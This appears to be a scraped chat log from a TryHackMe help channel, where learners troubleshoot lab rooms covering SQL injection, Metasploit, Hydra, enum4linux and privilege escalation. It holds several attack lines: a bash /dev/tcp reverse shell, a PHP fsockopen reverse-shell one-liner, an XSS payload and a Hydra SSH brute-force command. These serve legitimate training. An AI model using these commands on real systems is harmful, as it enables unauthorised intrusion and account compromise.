i just learned about brute force and sending reset password emails from other users accounts to my own email. is it allowed to test this stuff on random sites? lol

@burnt rivet you seem to have all the answers

@trim haven

No, that’s illegal

If you get permission to do it from the owner it wouldn't, there are probably websites specifically made for hackers to legally play with that stuff

Tip: ../ --> web traversal

Ah man I need my glasses

🤓

rfi is crazy that it apparently rarely happens

RFI was a nightmare for me

I'm finishing off Metasploit soon

hi I'm having trouble with level four of SQLi

in blind sqli

I am querying the database and I don't see a table even tho I am trying every letter of the alphabet

what is that room ?

blind SQLI - time based

its in the SQLi room

can you pls link it

https://tryhackme.com/room/sqlinjectionlm

in band sqli part

blind sqli

not in band

in band I already completed

hold on

what task is it

task 8 but I think I found answer

hold on a sec

ok I think I found it nevermind

ok. great

hi im doing ohsint CTF and im stuck at the second one

i got the location and i typed that location in wigle net

but the hint says it has something to do with BSSID

so im thinking can i get more info about BSSID from a photo or do i still need to find more about BSSID in wigle net

the location is Hawes

---- ExifTool ---- ExifTool Version Number : 12.42 ---- System ---- File Name : WindowsXP.jpg Directory : . File Size : 234 kB File Modification Date/Time : 2022:07:23 09:14:52-04:00 File Access Date/Time : 2022:07:23 09:26:21-04:00 File Inode Change Date/Time : 2022:07:23 09:15:31-04:00 File Permissions : -rwxrw-rw- ---- File ---- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg Image Width : 1920 Image Height : 1080 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) ---- XMP-x ---- XMP Toolkit : Image::ExifTool 11.27 ---- XMP-exif ---- GPS Latitude : +54.2947963000 GPS Longitude : -2.2503684000 ---- XMP-tiff ---- Copyright : OWoodflint ---- Composite ---- Image Size : 1920x1080 Megapixels : 2.1 GPS Latitude Ref : North GPS Longitude Ref : West GPS Position : +54.2947963000, -2.2503684000

You got the location already?
You should be able to find the location for question 2 once you found the BSSID

how to find BSSID

ohhh thanks

yeh yeh i found the social media account in the first question

thank u for helping me

Gave +1 Rep to @left thunder

• 😎

• @white salmon

Gave +1 Rep to @dusk totem

Hey guys!! Can someone help me with simple Ctf room

oh sure

what are you stuck on???

@alpine kestrel same point where i was earlier!!! Sql injection

Everytime i use CVE its gives out different output

ah still getting weird output from that script???

Yaah

have you tried converting it to python3 with 2to3 yet???

I tried it

But wasn't successful in it

I'm unable to understand why this CVE is giving me this kind of output..
What's the reason behind it?

¯_(ツ)_/¯

I yried contacting to the person who created this room

worked the first time after shadow ran it in python3 after conversion

@fervent vault try this file to see if it works

rather not give you the correct output unless this also fails

I have this.. downloaded from exploit db

yeah but the one above is what 2to3 outputted for shadow

i.e run it with python3

Okkieee so this one will work with python3

yuups

@alpine kestrel trying it out will let you know if it give up something..!!!

good luck

still works for shadow

thnks @alpine kestrel !

@alpine kestrel getting same weird results... 😭

can you show the whole command you ran to run the script???

I really struggle to understand the question

I tried 128 and 512 (Stand for 8x16\8x64) but it's not the answer

2^8

and it's probably best to delete the pics so you're not giving away flags.

||Now I understand I think (it's because the bits are just 0 and 1 so I have just 2 possibility so it's why it's work with power and not multiplication ?) @lucid junco||

Possibly, when I first done it that calculation was the first thing to pop in my head.

Heya, anyone here complete FollioMSDT?

Hmmm. Interesting. I can exec the vuln easy enough. I just can't answer 2 of the questions. What I THINK is the answer isn't being accepted.

@burnt rivet The room looks as if its public in the search.

I'm doing SQL injection room level 4 and I found that the name of the database starts with "sql_"

I'm having a hard time figuring out the name of the full database

I tried entire alphabet

I tried every digit

I don't understand

ok hold on

I was able to get "sqli_four"

ok I got that the database I was looking for was sqli_four

but how do I select something from it?

I tried selecting tables from sqli_four and it didn't work

In room Metasploit: Exploitation, task 2, question 3, "What is running on port 8000?"
I ran msfconsole
use auxiliary/scanner/http/http_version
setg rhosts 10.10.224.228 set LPORT 8000 run.
It tells me the scan is complete but gives no results. What did I miss?

I prefer nmap for service and port scan not metasploit

I am in the Metasploit room trying to learn Metasploit.

Do you mean using nmap within Metasploit?

You using http_version on port 8000, what if it does not have webserver running?

Create new tab of terminal and run nmap against port 8000.

The hint says to use the http_version module.

Ohh

Check if you have set the correct values?

It looks like it.

Try to use show options and see that you misinterpreted one of the parameter .

Yes

Thanks.

Gave +1 Rep to @vernal yew

gone

Hi everyone, i'm newbies. I get something wrong task 6 Virtual Host - Subdomain Enumeration, i'm using the provided script but no sub domains are coming up : ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.82.169. I'm running the exact same command as everyone else but getting zero results with and without the -fs flag. Can anyone help me please...

You sure that IP is from the target machine and not the attackbox?

Do you see a box similar to that?

It was displayed with Title: acmeitsupportv10 and IP Address: 10.10.200.185 in Subdomain Enumeration room

For task 7 in Network Services, how do I view flag.txt?

I did everything in the instructions but I'm confused.

I ran the "msfvenom" script in the telnet session, so I assume I do.

I get it now

Hi there, I've just finished the Pickle Rick challenge (at last 😓 ), and I was wondering some extra-stuff.

I'd like to dig a bit more about two things :

• The 1st is ||on the login page : I found that there was a way for cross-scripting in the username field as I succeed to pop an alert with this entry "/><script>alert('pop')</script> but after that, I was stuck to exploit this flaw, like while trying to get a reverse-shell for example. Was-it possible ?||
• The 2nd is kinda of the same type : || once the command line reached, I tried again to get a reverse-shell, with a simple /bin/sh -i >& /dev/tcp/10.0.0.1/1234 0>&1 and some similar command-line, but it never worked...did I tried for nothing ?||

Thanks in advance for your time and patience 😉

Oh, I got it for the 1st one, and for the 2nd, I understand there's many (many many, soooo many) things I'm still ignoring indeed. Thanks 👍

Gave +1 Rep to @burnt rivet

Hi is anyone gonna be on here in another hour?

I need help with sql injection room

pity you didnt ask directly, i am interested where you got stuck

hi i have a little problem with wigle net

everytime i search, i always got search failed error

im doing ohsint ctf

i got bssid and now im using wigle net to find the location

Did you create an account on wigle?

yep i did

View > Basic Search?

yes that one

And it didn't work?

yeh i typed the bssid in bssid/MAC box

and it didnt work

Did you hit query ?

yes i did

Can you DM me a screenshot?

ok

Hi All,

I'm trying to solve simple ctf room

but getting an error

yes the same one

tried with both python 2 and 3, but same error

python3 cms.py
Traceback (most recent call last):
File "/home/soni/cms.py", line 11, in <module>
import requests
ModuleNotFoundError: No module named 'requests'
┌─[✗]─[soni@parrot-pc]─[~]
└──╼ $python2 cms.py
Traceback (most recent call last):
File "cms.py", line 11, in <module>
import requests
ImportError: No module named requests

already installed

You haven't installed all the dependencies. Your best bet is to create a python virtual environment (venv) and install all the dependencies and needed scripts in the venv and not the system python.

but receiving an error
$pip install python-requests
ERROR: Could not find a version that satisfies the requirement python-requests
ERROR: No matching distribution found for python-requests

I know that seems complicated, but it makes your life easier when you have python dependencies that conflict.

It's just pip install requests

ip install requests
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (2.25.1)

try python3 -m pip install requests perhaps?

even this didn't work

Are you using a venv?

no

what was exact output?

also what is your base operating system, it seems like you are installing requests on different version of python

than what you are afterward using to launch the program

not really, if you had it it would work

https://stackoverflow.com/questions/17309288/importerror-no-module-named-requests

try to take a look at this

Nope, python3 -m pip install requests will use Python3 and it will use the same pip as what's used when running python3 cms.py

i agree, but he didnt show the output of that command, if it ran correctly tha python3 -m pip install requests , or if there was some additional problem

Bit stuck here. Currently in a meterpreter session, I've uploaded a meterpreter payload to the machine for privesc. The privesc path is unquoted service path, so I'm trying to output the content of the payload into the service executable, however the usual trick of "cat payload > service.exe" is outputting to console.

Nvm brainfart - all sorted

Network Services - Task 3, Question 2: What ports is SMB running on?
Supposed to use enum4linux on the IP address.
I tried using "enum4linux -a IP" but sifting through it all, I couldn't find exactly what I was looking for. It might be in there, but I can't recognize it.

did you not use nmap first???

@alpine kestrel I did, got the 3 IP addresses to look for
So I'm still using Nmap for question 2 then?
@burnt rivet Mostly guessing, but I'd imagine SMB programs would have their destination written in their TCP protocol

3 open ports

my bad 😅

sure, but I don't want to brute force all 3 into the answer box
Is there a specific nmap tag that brings up SMB information?

Got it!
Ran the -sV scan for service info and saw the Samba next to 139 and 445

Thanks 👍

Hi guys

hello

i'm new and I'm stuck on Nmap lesson. I can't fiure out what is my target on task 14. Could you help me please ?

start the machine? if you haven't, you will see IP address and that will be your target

I started it but I didn't see IP target... I saw my own IP...

can you share the screenshot?

ok just a minute please

!docs verify

verify first to send ss

click on this green button to start the machine

Sorry for the waiting

start the machine from task 1

the right side of your screen is attackbox

Thanks 😉

Happy Hacking!

Thanks

+rep @cold eagle

Gave +1 Rep to @cold eagle

Hi guys

I know how to scn my own inferfaces with wireshark but I don't know how to scan a target... Can you help me please ?

It's for the Nmap lesson

Mh, what you mean with scan with wireshark?
You can only capture traffic with wireshark

Sorry I just understand what the question is... The problem : my english understanding... 🤦

Okay, just checked what question you are talking about, I guess this one, right ?

yes it is 😅

Since you are on the attackbox, just open wireshark, start capturing on eth0 with it.
Then run the nmap scan against the target machine

If you are unfamiliar with wireshark, you might want to check out the wireshark rooms

I will I know how it works but I'm not really good at understanding the whole results 😅

is there a way to save the results of wireshark for after the wireshark lesson ?

You can yes, but you have to transfer the generated pcap file to your own machine, or somewhere else, since the attackbox will be reset once you shut it down

How could i send it to my computer ??

You could use scp with the credentials that can be found at the bottom of the attackbox, when pressing the info button.

Thanks 😉

Or since you are subscriber, your attackbox has internet access, upload the file to a file host

Hello everyone, im trying to do the room/wiresharkthebasics and got stuck on "Go to packet 12 and read the comments. What is the answer?"
I have managed to get to the picture, but now I have absolutely no idea what to do, wondering if anyone can give me a hint on how to proceed?

Tried zooming out?

yeah, can't see anything and looks like the word they are looking for is pretty long as well

start by checking your ip and port and make sure you are trying to send the shell to the right ip

Room is WindowsPrivilegeEscalation from Jr.Pentester Path
I am trying to dump hashes from the registry hives but always get the error "NoneType" at the sam.hive

Any tipps ?

need h1nt

I'm having issues with figuring out the right database name

I think it starts with "sqli_" but I don't know what comes after that

like I've been trying to figure it out for a while

could someone help me out?

if no one is on could someone please DM me when you see this?

I have tried every key to find something after "sqli_"

can anyone help me solve this

Has anyone completed Attactive Directory?

I'm having an issue running the secretsdump.py

it gives an error about no module named 'impacket.examples.utils'

what does pip install impacket show you?

im using the attackbox so everything was preinstalled

one sc

if you're on the attackbox then it should work, make sure you're using the /opt impacket and python3.9 I think

I can dm you a screenshot of the command im using just to not give away any spoilers

nah, spoilers aren't a thing here,

oh okay

the're only for recently released ctf challenges(3 days to a week)

I tried running it in the folder and tried using absolute path]

does python3.9 do anything or is it the same error

that works!

yeh, dependency hell strikes again

haha thanks!

yes, it's up

no luck

connection refused error

for the Basic Pentesting room, should I be using Hydra to attack smb or ssh? when I do smb it says invalid user and ssh is running for a little while

for ssh yes

do u have the username already?

thats what I thought, but its been running using rockyou didnt know if I was doing something wrong

can u show the command?

yeah jay and kay. got it from enum4linux

show your hydra command

hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.195.47 -t 4 ssh

weird it's right already what is the error then?

or it just keep running?

just still running, from the notes on the webserver apparently jan has a weak password so I figured it wouldve found it quickly

yes the password is just a name

||hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://$IP||

can u try this?

yea

should it be quick?

yes

maybe I need to restart the box?

yea try that first

What's your target IP?

and run the command again

10.10.195.47

if you want to try @lucid junco

let me try don't terminate yet

ok ill wait

I knew I was doing it right and something seemed off lol

since I just finished the Hydra room to refresh my memory

the password that i know works fine

it's just hydra that take long

try to use Seclists password instead

it's smaller than rockyou

||/usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt||

and this file specifically if u want it faster

ah I dont have that one

it's in github search for it

and should restart target machine

found it

apt -y install seclists

I asked you in another channel, please don't spam, it won't get you any help faster.

finally. seclists worked. Thank you! @lucid junco @languid isle

Gave +1 Rep to @lucid junco

+rep @languid isle

Gave +1 Rep to @languid isle

omg this box is the slowest. yes the same one. Logging in ssh I get about 15 seconds before the terminal locks up

so for the priv esc, I see that vim has SUID, am I on the right path?

basic pentesting

ah I already closed it. It's what linenum reported, I thought it might be useful

I probably did, I tried some one liners to get a shell and it didnt work

yes I gave up on that

that didn't work

10.10.10.96

damn, I was in the middle of a reverse shell too

oh 🐋🤷‍♀️

yeah had to restart

nah moved onto rootme.

i've got foothold but both home dir are empty, y no user flag

or user text

its asking for one

nah I said I moved onto rootme lol

thats step 4 though.

i checked both users
test
rootme

both are empty

oh i was overthinking it

i found it in ||var/www||

I got groot

https://tenor.com/view/baby-groot-dancing-guardians-of-the-galaxy-gif-5723155

I feel like ive done a very similar box before so it was ez

sounds familiar lol so maybe

oh yeah

I think the only difference was there was a cronjob that ran as root every 2 minutes a user could modify. but everything else was the same

Hi, I have troubles with Network Services 2, task 3: i'm being asked to type the password, but I thought it were sufficient to have the id_rsa

yeah it doesnt like stuff that isnt a particular permission

yes, i did

ssh -i id_rsa cappuccino@10.10.180.11

Here it is

chmod 600 id_rsa

Was wondering if anyone could help with this I’m in the Vulnerability Capstone room. I'm on the last part of the challenge. I found the CVE and I’m tryin to get a reverse shell. I downloaded the CVE and I ran this command ---> python3 47138.py http://10.10.75.154

It throws this back → File "/home/testbox/Downloads/47138.py", line 34
print r.text[0:dup]

Try running it with python2

k

thanks

Gave +1 Rep to @dusk totem

that seemed to work I got a cmd:

but when I type ls or whoami it kicks me out ?

ok I'll give it a shot!

yeah if you don't mind

jaxafed

It seems like the exploit sends the request through burp, if it is not running you can change the r = requests.get(burp0_url, proxies=proxy) to r = requests.get(burp0_url)

@vague pine you're the only person I've seen whose completed insane rooms and still hanged around

I try what you suggested and this is what I got ?

Also don't forget the change the url on line 14 to your target.

yeah that what the scripted is set at

OK

ok thanks

Gave +1 Rep to @dusk totem

here's the scripted

lol ok so change the url to the box I'm attacking 🤦‍♂️ and how do I stop it form going to burp? I don't even have burp running.

ok

ok should I just delete that part if I'm not use burp for this attack?

ok or change it my my ip

ok I think I got this.. 🤪 thanks!

Gave +1 Rep to @burnt rivet

Gave +1 Rep to @dusk totem

Gave +1 Rep to @vague pine

Something is wrong with the Blue room...........

Unless i'm using the wrong syntax in Nmap..............

Could someone tell me if this is correct plz;
└──╼ $sudo nmap -sV -vv --script vuln -p 1-1000 -Pn 10.10.225.117

!dark

Are you trying to enum the top 1000 ports?

I am, yes.

This is right too though isn't it;
└──╼ $sudo nmap -sV -sC --script=default -p 1-1000 10.10.225.117

The space between -p and ports does not make a difference and -sC is the same as --script=default

Oh, I see....... I did think the room was broken though.

Thanks............

Gave +1 Rep to @dusk totem

I'm not sure, The machine is down now, So i'll work with another.

I mean......... I let it time out.......

So..........

Blue isn't broken.

It's never broken.

!dark

!dark

!dark

Blue room is never broken

is that true !8ball?

0.0

-8ball is that true?

yo what lol

No

Hi everyone, I’m new on the TryHackMe, after trying the first task intro to offensive security and I’m not getting the it.. can someone explain the error

well if you could verify your discord with tryhackme to send a picture it would be easier to see what you are doing wrong to help you....

!docs verify

I think I’ve verified??

not yet as i can see

Hello, can I have some help on JVM Reverse Engineering (https://tryhackme.com/room/jvmreverseengineering) ?
Task 4 - Basic String Obfuscation
I already got the password from the decompiler which is 17-character long. But my answer is wrong. Any clue?

do you have this cuz it's incorrect? aRa2lPT6A6gIqm4RE

yeah

oh that's incorrect

yeh, a little xor magic is needed

ok thanks for the tips

what are you using to see the decompiled code?

just online decompiler

yeh, don't do that, would recommend jadx/jadx-gui or some other java decompiler

thank you ❤️

Gave +1 Rep to @cedar anvil

Scratch that.. restarted the machine it works now 🙂

Hi guys, I'm doing Network Services lesson

For Task 3 I have to answer to this question : What ports is SMB running on?

Can you give me a hint please? 445/tcp doesn't work

ports

not port

ports

it probably doesn't want the protocol after the slash, so what did your scan show you?

Is netbios part of SMB ?

port 22 ssh
port 139 netbios-ssn
port 445 microsoft-ds

ok so, which of those have smb or samba noted with them?

that should be your answer

also go in order of what showed on the scan

I looked on https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbersAnd only 445 was listed... But I checked and got the asnwer...

your scan should show you which ports SMB is using for that machine. Defaults are often the case but not always, which is why recon is important because services are configurable for ports right? Someone thinks they're being clever and using a non-default port to obfuscate

please put it in spoilers

I didn't put the right option 🤦

I know I'm dump but... Can you give me a hint about " What share sticks out as something we might want to investigate?"

Don't be hard on yourself, just gotta keep at it until things click

alright so what did it have you just do?

I just did enum4linux

Also, THIS is the exact reason you have a lab, so that you make mistakes they stick in your brain better. You remember mistakes that cost you time an effort. You learn more when things go wrong

To have informations about the computer

Good, what was the output

?

more specifically the output it's referring to as what could be interesting

I have to separate it

because that output might be a-lot

||
`WARNING: polenum.py is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jul 28 17:09:12 2022

==========================
| Target Information |

Target ........... 10.10.164.146
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
`||

gimme a sec

||`

| Enumerating Workgroup/Domain on 10.10.164.146 |

[+] Got domain/workgroup name: WORKGROUP

=============================================
| Nbtstat Information for 10.10.164.146 |

Looking up status of 10.10.164.146
POLOSMB <00> - B <ACTIVE> Workstation Service
POLOSMB <03> - B <ACTIVE> Messenger Service
POLOSMB <20> - B <ACTIVE> File Server Service
..MSBROWSE. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

======================================
| Session Check on 10.10.164.146 |

[+] Server 10.10.164.146 allows sessions using username '', password ''

============================================
| Getting domain SID for 10.10.164.146 |

Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

=======================================
| OS information on 10.10.164.146 |

[+] Got OS info for 10.10.164.146 from smbclient:
[+] Got OS info for 10.10.164.146 from srvinfo:
POLOSMB Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
`||

||`==============================
| Users on 10.10.164.146 |

==========================================
| Share Enumeration on 10.10.164.146 |

WARNING: The "syslog" option is deprecated

Sharename       Type      Comment
---------       ----      -------
netlogon        Disk      Network Logon Service
profiles        Disk      Users profiles
print$          Disk      Printer Drivers
IPC$            IPC       IPC Service (polosmb server (Samba, Ubuntu))

Reconnecting with SMB1 for workgroup listing.

Server               Comment
---------            -------

Workgroup            Master
---------            -------
WORKGROUP            POLOSMB

[+] Attempting to map shares on 10.10.164.146
//10.10.164.146/netlogon [E] Can't understand response:
WARNING: The "syslog" option is deprecated
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
//10.10.164.146/profiles Mapping: OK, Listing: OK
//10.10.164.146/print$ Mapping: DENIED, Listing: N/A
//10.10.164.146/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing *

=====================================================
| Password Policy Information for 10.10.164.146 |

[E] Dependent program "polenum.py" not present. Skipping this check. Download polenum from http://labs.portcullis.co.uk/application/polenum/

===============================
| Groups on 10.10.164.146 |

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:
`||

Erm, my bad, next time I'll have you DM this since it's a lot of info. The goal to keep things in hints is so others can search prior convos and help themselves

all good though

there's a lot of info here

The mindset you need to have is that you're investigating

You're not looking up an answer, the question wants you to ask what may be of interest

and there may be a few things

I found it

ya? good deal

I didn't understand that tryhackme wanted to have the sharename

dunno if I agreed with their answer here when I looked at what I did, I would have said ||netlogon||

I thought it was a general name inside the share enumeration

It might be but all the same it could still be interesting

But I think you got the idea, I mean it was a curious thing to consider

I don't know... You wish to have information on the computer... You will find more information about the user and not about the network connection, right?

Depends. Users are an easy attack vector but they aren't the only one. You still have lots and lots of vulnerabilities that can be leveraged

and you HAVE to understand those too

That's the hardest path 😅

Not as hard as you think

I hope so

Google makes it easier. Recon is important because it can show us a weakness, and google can help you find an exploit someone has already proven to work, written a script for, and then all you do is execute it and you're in

This room's purpose is to explain common services you'll see so you know what is and isn't relevant

besides... most of these rooms are going to have you using exploits and such to get flags. They can't all be OSINT and brute forcing passwords

right 😂

I promise if you stick with it, it'll eventually start clicking in the place

it just takes a while and a lot of exposure

thanks

you're welcome

You have to crack the hashes by hashing a large number of different inputs (often rockyou, these are the possible passwords), potentially adding the salt if there is one and comparing it to the target hash. Once it matches, you know what the password was. Tools like Hashcat and John the Ripper are normally used for this.

but the salts are unique to each user, right? then how do those tools add the right salt?

sorry, what is a hash dump?

you mean its a part of hash and hashcat removes it?

say someone hacks a website... then they find the database with all the hashed password.... when they send that out on the internet it tends to also have the salts in the database

no, it cant remove I think as the salt is a character added to the password which results in a different hash

this is called a dumping of the database

here hello world is the salt?

$2a$06$7yoU3Ng8dHTXphAg913cyO6Bjs3K5lBnwq5FJyA6d01pMSrddr1ZG
in this hash, is "06" the salt?

yeah funny

man sslpasswd

then whats the point of adding a salt here if it can be easily removed by just looking

Lassi told you exactly what you wanted to know, twice. Read the docs, ask again if you have trouble getting what the docs are telling you.

so the salts are useless against brute force attacks, is that true?

got itttt

thank you very much

I appreciate it

Hi...into https://tryhackme.com/room/attacktivedirectory# I need to enumerate the subnet where is attached the Attackbox VM in order to start getting information about AD to attack?

John can be very particular about the formats it needs data in to be able to work with it, for this reason- in order to crack /etc/shadow passwords, you must combine it with the /etc/passwd file in order for John to understand the data it's being given.

I didnt get why I should combine them, can anyone explain pls?

why should I combine them for John to understand it?

you don't explicitly need to join them but it's neater for john to understand this way,
it associates hashes with usernames and such, but I've almost never used unshadow honestly

alright

still didnt get it, when I unshadowed, it just added the root line of passwd at the end of the line in shadow. How is it gonna help John?

it's neater, it shows cracked passwords next to users, not just random hashed values

aa now I get it. Thank you very much

anyone know , why john isnt working?

do john --show hash to see if it's already cracked

nothing

👀

0 password hashes cracked, 0 left

Just cat the hash file, you will see what is wrong.

?

its here , just above john command

Just run "cat hash" and share the screenshot please.

done thnx

anybody here?

ok my b

just wondering if i was yelling into the void

anyway

i had a question about one of the rooms, particularly task 6 on windows fundamentals

i cant figure out the answer to the first or last question, those being "What is the name of the other user account?" and "What is the account status?"

nvmind

i got it

while running ssh2john, I'm getting the below error

Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'

Are you using python3? If yes then try with python2

Hey Guys, for the Basic Malware RE room, is any of the files harmful for my laptop, or is it safe to download them

They are not actual malware. It is safe to download and execute.

Thanks!!

maybe not completelly appropriate to ask here

if i want to maximize score, how can i choose the rooms (only for 24 hours)

i want to do maximum points, is there a way? because i see that some rooms dont add score at all

if someone would be so kind to tell

Some rooms don't give points at all, so it's best to avoid walkthrough rooms.

Some rooms have questions that have +** and they have bonus points.

Are you trying to get to 0xD, or are you after the monthly hacker badge?

monthly thingie 🙂

Hello!
Some who has an idea about the second artist on "Wireshark: The Basics" room?
I'm really stuck: I've tried to search for string like || artist=2 || and also || artist || but cannot find anything related to the second one

#993868677600514130 Someone is stuck on the same question right now

I'm racking my head on Overpass1!!!)
For a very long time.
I know where to look, but I don't know how to apply this vulnerability.
I reread the OWASP top 10 and once again redid all the tasks from the OWASP Top 10 room.
But I still didn't understand what to do with the data received from:
||login.js
} else { Cookies.set("SessionToken",status Or Cookie) window.location = "/admin"
Do I need to create a token myself?
Find admin cookies (but there are none)?
Add to Burp:
Cookie:sessid="SessionToken"?||
I don't want to go to the walkthrough, the level is easy for the machine, I want to reach the solution myself.
Please give one more little push to the solution.

@burnt rivet I can write in DS?
(so as not to covering up half of the text here)))

In **Authentication Bypass room **
Encode the following value using base64 {"id":1,"admin":true}

when I do
echo '{“id”:1,”admin”:true}' | base64
e+KAnGlk4oCdOjEs4oCdYWRtaW7igJ06dHJ1ZX0K

Whereas the accepted answer is
eyJpZCI6MSwiYWRtaW4iOnRydWV9

What am I missing ?

What do you mean by fancy quotes

$echo '{“id”:1,”admin”:true}' | base64
e+KAnGlk4oCdOjEs4oCdYWRtaW7igJ06dHJ1ZX0K

$echo '{id:1,admin:true}' | base64
e2lkOjEsYWRtaW46dHJ1ZX0K

$echo "{id:1,admin:true}" | base64
e2lkOjEsYWRtaW46dHJ1ZX0K

when I decoded

$ base64 -d <<< "eyJpZCI6MSwiYWRtaW4iOnRydWV9"
{"id":1,"admin":true}

😄 Straight versus curly quotation mark 😄

Thank you

makes sense to me now

Very common problem when you write the script in anything that isn't a terminal

must use more copy paste 🙂

Hi, me again, still on the telnet room
I did everything good (or not visibly), and it doesn't seems to work

oh

i'll try that

thank you @white salmon

Gave +1 Rep to @dusk totem

it works !!

I am doing Lateral Movement and Pivoting, Task 5.

I am doing Pass-the-ticket method, and I injected t1_toby.beck3 ticket.
Then I went to \Users and opened t1_toby.beck directory and I was able to get to his Desktop and to see Flag.exe file which contains the flag. But when I opened it, it says "Sorry! You are still missing something. No flag for you yet. (1)"

I know that I injected t1_toby.beck3 instead of t1_toby.back ticket, but when I exported tickets using mimiktaz, I didn't see ticket for t1_toby.beck ticket, only t1_toby.beck3 ticket

+Rep @thorn stone

Gave +1 Rep to @thorn stone

ty : O

hi all, i'm doing the sqli room but when they asked me for the flag, i cldn't really see where it is even though i've solved the qns

which room to be exact? can u link it?

hihi thanks for responding

i found the ans alrdy

thanks!

Hi Everyone
I'm doing the "ninja" room, but cant find the "bny0" file. I already know its the answer to one of the questions, but I'd still like to understand what I'm missing when trying to find it. I'm using the built in "find": find / -type f -name "bny0"

instead of a -name, try -iname (to make it case insenstive), no joy there
drop the -type f incase its a directory. Still no joy
try follow symbolic links (-L before /), sits there spinning its wheels, pretty sure I got it in an infinite loop.
swap the 0 to a o.
I've even taken a look at others walkthroughs, they just guessed (same as I did) as you can exclude the other files.

Did anyone manage to find it?

can you share the room ip?

Its this room, i just terminated though
https://tryhackme.com/room/ninjaskills

I'll spin it back up now

ssh user and password are in the description

10.10.150.188

ok, that's really weird

going through other walkthroughs online (when I got stuck), i'm wondering if it's on purpose or not

where is the file?

no idea, i can find anyone else online who found it

I've taken a look at the room-bugs channel, and it looks like it's deliberate (or at least was in 2020)

thanks anyways

Does this file have extension?

nope

hello

On Linux PrivEsc, task 6 is asking "Consider how you might use this program with sudo to gain root privileges without a shell escape sequence." I have no idea. I also can't seem to view the options of the program. When I try running it with --help I get this: "bad user name ${APACHE_RUN_USER}"

hey so im on jr pen tester walking an application, ive tried reading the forum posts but it doesnt seem like anyone was having my same problem but I cannot find the answer to the HTML comment in question 1. I found q2 but from what I see there is only one link the comment section and that took me to a thm page but didnt go anyway meaningful.

Solved it meanwhile ?

No i found the last flag so i have q2 and q4 i believe but i turned off my pc to go to bed. Was having a hard time with the other 2

Okay, well you have to look for a comment, it's not a link or something, the comment is just giving you a path you have to try to visit

hi

hi

I could use a hint for "what is the user's shell set as?" [Severity 1 - Command Injection Practical] from Injection4. I have tried a few different things but I can't seem to get to the answer.

Owasp top10?

Do you have the reverse shell?

Yes, OWASP top 10 room

You got the reverse shell?

this one doesn't require much more than navigating to the URL to execute the evilshell.php script

Try and get a shell.

It will make it easier.

I did research one liners that could accomplish that but was not successful in this room

What's you're target IP?

swisskyrepo for example... and it's 10.10.99.106 as assigned

what type of one liner would you recommend in this scenario? @lucid junco

||php -r '$sock=fsockopen("tun0",4444);exec("/bin/sh -i <&3 >&3 2>&3");'||

that looks great... I will give it a try right away

thank you so much!

+rep @lucid junco

Gave +1 Rep to @lucid junco

Remember and start nc first.

Anymore bumps, ping/ask in here.

Yes, I got the listener going and will definitely reach out again if I can't get it. Thanks again!

nc quits after the connection is established leaving me without a shell... I'll triple and quadruple check for typos on the command right now

got it

the shell that is

in all the "piping" inputs (< >) from the /bin/sh I had missed a space

got the answer @lucid junco. Thanks for the super helpful hint!

Gave +1 Rep to @lucid junco

Did you manage to complete that task?

I sure did... I did look at the answer straight in the eyes earlier and missed it on the browser, but going through the shell made it all the more obvious

😄

It can be done there, but I found the information on the reverse shell so much easier.

im doing simple-ctf and im stuck at "What's the CVE you're using against the application?" ... i scan and i found that ssh uses 7.2p2 and i google it but the only thing that i found the most is user enumeration but none of the CVE about user enumeration is a correct answer ... it would be helpful if someone gave a help ... thanks

exploit is not against SSH. is against CMS Made Simple 2.2.8. now you need find that CVE on cve.mitre.org. you need research. and how to do it. that i ca't tell you since you have to learn 🙂

exploit-db is a good source to get exploit code

😐 damn i have been doing wrong the whole time

anyways thank u for helping me

np. let us know if you get it

yep

hi all, did you guys end up creating a meterpreter session for Task 29 of the OWASP10 room?

getting at the actual vuln but the reverse shell I tried is not working for some reason... that's kind of one my weak points right now

I'd be happy to continue this over DM if you prefer

Gave +1 Rep to @fallow sedge

I was just curious if someone ended up using that route as opposed to just a plain reverse shell

yeah... struggling with the mechanics of piping to gain control of the executed shell. The one I chose does not seem to be working so I will go ahead and try to find another one...

well, I got it... moving on

every time i try to answer this question in gobuster room i can get nothing

Which room are you in?

web enumeration

hey,

in metasploit i can't cd to c:\Users\Jon\Documents\

Are you in the C shell?

no on terminal

in meterpreter

Have you exploited Blue yet?

yes

So you have a meterpreter shell?

yes

Just type shell

i find the location of the flag.txt

thanks

more filename.txt

why we use the comand more?just for knowlage

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/more

thanks

hi

I need help on the Burp Suite: Repeater room

this is for the challenge

I tried changing HTTP to FTP, changing HTTP version, and changing product number, including using decimals

its not working

can someone help me with this?

thanks

just to see if I could get the 500 internal server error

